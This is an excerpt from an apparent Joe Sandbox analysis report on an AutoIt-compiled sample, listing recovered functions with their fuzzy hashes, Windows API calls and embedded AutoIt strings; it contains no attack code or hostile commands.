                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bd843b5dd0330ff7e1e0994229c1622c5e30a7f5c69fe5e500ccb3132ca77b
                                                                    • Instruction ID: d31467614d4bc996b4f12c5090796233de1c1e9c499c87c7939e220e7d4d9e7f
                                                                    • Opcode Fuzzy Hash: 67bd843b5dd0330ff7e1e0994229c1622c5e30a7f5c69fe5e500ccb3132ca77b
                                                                    • Instruction Fuzzy Hash: C922AF74900625CFDB24DF54D490AEAB7F2FF14314F248079E98AAB351E736A981CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ce4c3ac322d5422c9d69f588a56dc9c787cff398afd1babbeee2cf01b1a49eb
                                                                    • Instruction ID: 1311ff02d6f78d93548924fa9c769519e74c0ce4e2a75ccf2f87b55a75d3af6f
                                                                    • Opcode Fuzzy Hash: 5ce4c3ac322d5422c9d69f588a56dc9c787cff398afd1babbeee2cf01b1a49eb
                                                                    • Instruction Fuzzy Hash: BE12A170A00619EFDF04DFA5E991AEEB7F6FF48300F104529E806E7650EB36A911CB64
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3728558374-0
                                                                    • Opcode ID: 86643eecf29e44e08a0d5f89d2945e73faf0191a94425ecf0cb562196975b471
                                                                    • Instruction ID: 4a15937ba4b706f12ba292409aeac69642a8cfdc03e0993f4eef5f21b43fb30b
                                                                    • Opcode Fuzzy Hash: 86643eecf29e44e08a0d5f89d2945e73faf0191a94425ecf0cb562196975b471
                                                                    • Instruction Fuzzy Hash: D302B270E00216EBCF54DF68D991AAEB7FAFF44300F148069E806DB295EB31DA15CB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                    • Instruction ID: 899a9f98c086ad0edaac6e5a3bce95df8f54784e6d71f04e75a239c789a874b3
                                                                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                    • Instruction Fuzzy Hash: 6DC1A8322051A34AEF2D473984344BEFAA25F917B1B1A176DE9B3CB6D5EF30C524D620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                    • Instruction ID: d65016f326e5eacdb1c6077af731ea87a0c404bee229a2c17fa230f16343e128
                                                                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                    • Instruction Fuzzy Hash: 47C1C6322051A309EF2D4739C4344BEBAA25FA27B171A176DE5B3CB6D5EF30C524D620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 541f8a0fff997c132c515462313e55b18cacb7e7607250483b6498fd1c07e741
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 43C17F3260509309DF2D473984744BEBAA25FA2BB1F1A177DE4B3CB6D5EE20C524D660
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 0067A2FE
                                                                    • DeleteObject.GDI32(00000000), ref: 0067A310
                                                                    • DestroyWindow.USER32 ref: 0067A31E
                                                                    • GetDesktopWindow.USER32 ref: 0067A338
                                                                    • GetWindowRect.USER32(00000000), ref: 0067A33F
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0067A480
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0067A490
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A4D8
                                                                    • GetClientRect.USER32(00000000,?), ref: 0067A4E4
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0067A51E
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A540
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A553
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A55E
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0067A567
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A576
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0067A57F
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A586
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0067A591
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A5A3
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006AD9BC,00000000), ref: 0067A5B9
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0067A5C9
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0067A5EF
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0067A60E
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A630
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067A81D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: e30e5fae1c8f6ac9800e8a69f72f6d9de4c089259617564c0d1fe4bd34ed72ce
                                                                    • Instruction ID: 57184bb8f27f242fb6b2a1829bf70d7073fa871c48fa39c62002538a926dab6c
                                                                    • Opcode Fuzzy Hash: e30e5fae1c8f6ac9800e8a69f72f6d9de4c089259617564c0d1fe4bd34ed72ce
                                                                    • Instruction Fuzzy Hash: 2B025F75900254EFDB14DFA4DD89EAE7BBAFB49310F008158F91AAB2A0D770AD41CF61
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0068D2DB
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068D30C
                                                                    • GetSysColor.USER32(0000000F), ref: 0068D318
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 0068D332
                                                                    • SelectObject.GDI32(?,00000000), ref: 0068D341
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068D36C
                                                                    • GetSysColor.USER32(00000010), ref: 0068D374
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 0068D37B
                                                                    • FrameRect.USER32(?,?,00000000), ref: 0068D38A
                                                                    • DeleteObject.GDI32(00000000), ref: 0068D391
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0068D3DC
                                                                    • FillRect.USER32(?,?,00000000), ref: 0068D40E
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0068D439
                                                                      • Part of subcall function 0068D575: GetSysColor.USER32(00000012), ref: 0068D5AE
                                                                      • Part of subcall function 0068D575: SetTextColor.GDI32(?,?), ref: 0068D5B2
                                                                      • Part of subcall function 0068D575: GetSysColorBrush.USER32(0000000F), ref: 0068D5C8
                                                                      • Part of subcall function 0068D575: GetSysColor.USER32(0000000F), ref: 0068D5D3
                                                                      • Part of subcall function 0068D575: GetSysColor.USER32(00000011), ref: 0068D5F0
                                                                      • Part of subcall function 0068D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068D5FE
                                                                      • Part of subcall function 0068D575: SelectObject.GDI32(?,00000000), ref: 0068D60F
                                                                      • Part of subcall function 0068D575: SetBkColor.GDI32(?,00000000), ref: 0068D618
                                                                      • Part of subcall function 0068D575: SelectObject.GDI32(?,?), ref: 0068D625
                                                                      • Part of subcall function 0068D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0068D644
                                                                      • Part of subcall function 0068D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068D65B
                                                                      • Part of subcall function 0068D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0068D670
                                                                      • Part of subcall function 0068D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068D698
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 6eaff8739e9a65648004700dfc14b98dd336ce0a9f58d0709b78a2d78316c3ef
                                                                    • Instruction ID: 35041fd33aa8fc055a137ed8e829db8350a6a0d0d748799c4a3531918b16139c
                                                                    • Opcode Fuzzy Hash: 6eaff8739e9a65648004700dfc14b98dd336ce0a9f58d0709b78a2d78316c3ef
                                                                    • Instruction Fuzzy Hash: 66917F71408301BFC710AF64DC48EABBBAAFB8A325F101B19F562965E0D771E945CF62
                                                                    APIs
                                                                    • DestroyWindow.USER32 ref: 0063B98B
                                                                    • DeleteObject.GDI32(00000000), ref: 0063B9CD
                                                                    • DeleteObject.GDI32(00000000), ref: 0063B9D8
                                                                    • DestroyIcon.USER32(00000000), ref: 0063B9E3
                                                                    • DestroyWindow.USER32(00000000), ref: 0063B9EE
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0069D2AA
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0069D2E3
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0069D711
                                                                      • Part of subcall function 0063B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0063B759,?,00000000,?,?,?,?,0063B72B,00000000,?), ref: 0063BA58
                                                                    • SendMessageW.USER32 ref: 0069D758
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0069D76F
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0069D785
                                                                    • ImageList_Destroy.COMCTL32(00000000), ref: 0069D790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                    • String ID: 0
                                                                    • API String ID: 464785882-4108050209
                                                                    • Opcode ID: d020694221eaa5fa2ce02a737413c79382fa7e4eef3a03ef8cc4e7606b816833
                                                                    • Instruction ID: c04559b1b89b4020d2037f87db19cff4bba7854a3289cb6728d112d0718385d9
                                                                    • Opcode Fuzzy Hash: d020694221eaa5fa2ce02a737413c79382fa7e4eef3a03ef8cc4e7606b816833
                                                                    • Instruction Fuzzy Hash: A8127E34604201DFDB15DF28C884BA9B7EAFF46304F145579EA89CBAA2C731EC46CB91
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066DBD6
                                                                    • GetDriveTypeW.KERNEL32(?,006BDC54,?,\\.\,006BDC00), ref: 0066DCC3
                                                                    • SetErrorMode.KERNEL32(00000000,006BDC54,?,\\.\,006BDC00), ref: 0066DE29
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DriveType
                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                    • API String ID: 2907320926-4222207086
                                                                    • Opcode ID: 78fb222641a0601f13be921227f8ba4b958d3101d99d7f51de0acf61ffa2c843
                                                                    • Instruction ID: 8d00e1686cafd3f37f158a5c645c493da4a7d61f6c63951a3c4b38945edae8db
                                                                    • Opcode Fuzzy Hash: 78fb222641a0601f13be921227f8ba4b958d3101d99d7f51de0acf61ffa2c843
                                                                    • Instruction Fuzzy Hash: 19518D30F48712ABC210EF14D982C69B7A3FFA4744B21482FF4479B391DA71D946DB86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-86951937
                                                                    • Opcode ID: 68841200c8200e4ec7cc878610a1c42e74dca60ade6564b6bab795bedacfc313
                                                                    • Instruction ID: 447ea7192540180a807133e292d35b776bbbf77dfd3bd2e0b17274841ca72f0a
                                                                    • Opcode Fuzzy Hash: 68841200c8200e4ec7cc878610a1c42e74dca60ade6564b6bab795bedacfc313
                                                                    • Instruction Fuzzy Hash: 10812B70640626BBCF64AB64EC93FFF376BAF55310F04402DF9056A282EB61D941CB99
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0068C788
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0068C83E
                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 0068C859
                                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0068CB15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: 0
                                                                    • API String ID: 2326795674-4108050209
                                                                    • Opcode ID: 64805ead4310e1b3ccdd2b740560804a4db7706d7d96df879c552c19afa611b8
                                                                    • Instruction ID: 05dd598659e14961209f1f9c72c4a6a8f3d2cd4176aa4a6859dd0e90c3f2ada7
                                                                    • Opcode Fuzzy Hash: 64805ead4310e1b3ccdd2b740560804a4db7706d7d96df879c552c19afa611b8
                                                                    • Instruction Fuzzy Hash: A4F1E070104341AFE725AF24C885BAABBE6FF4A324F08072DF599963A1C774D845DFA1
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,006BDC00), ref: 00686449
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpper
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 3964851224-45149045
                                                                    • Opcode ID: c818fb0f51674ec799046c364a3ba95f388f34e5762eff940a1032e873fc8d1d
                                                                    • Instruction ID: 87cb7d525a150118443e007ea83e13b6c56943af8617d5f6ea3b9e70a11f2042
                                                                    • Opcode Fuzzy Hash: c818fb0f51674ec799046c364a3ba95f388f34e5762eff940a1032e873fc8d1d
                                                                    • Instruction Fuzzy Hash: DDC16B302042458BCB44FF10C551AAE77A7AF94344F04596DF8966B3E2EB31ED4BCB9A
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0068D5AE
                                                                    • SetTextColor.GDI32(?,?), ref: 0068D5B2
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0068D5C8
                                                                    • GetSysColor.USER32(0000000F), ref: 0068D5D3
                                                                    • CreateSolidBrush.GDI32(?), ref: 0068D5D8
                                                                    • GetSysColor.USER32(00000011), ref: 0068D5F0
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068D5FE
                                                                    • SelectObject.GDI32(?,00000000), ref: 0068D60F
                                                                    • SetBkColor.GDI32(?,00000000), ref: 0068D618
                                                                    • SelectObject.GDI32(?,?), ref: 0068D625
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0068D644
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068D65B
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0068D670
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068D698
                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0068D6BF
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0068D6DD
                                                                    • DrawFocusRect.USER32(?,?), ref: 0068D6E8
                                                                    • GetSysColor.USER32(00000011), ref: 0068D6F6
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0068D6FE
                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0068D712
                                                                    • SelectObject.GDI32(?,0068D2A5), ref: 0068D729
                                                                    • DeleteObject.GDI32(?), ref: 0068D734
                                                                    • SelectObject.GDI32(?,?), ref: 0068D73A
                                                                    • DeleteObject.GDI32(?), ref: 0068D73F
                                                                    • SetTextColor.GDI32(?,?), ref: 0068D745
                                                                    • SetBkColor.GDI32(?,?), ref: 0068D74F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1996641542-0
                                                                    • Opcode ID: 32e06d26a3d5e68fdac73fb9e3d0de535d91cef4eed8a8e26725e23048d06e1b
                                                                    • Instruction ID: c4f1d951e50d715365497b0e40eacc59ff6367b0c7d454472c2abe04a1230f36
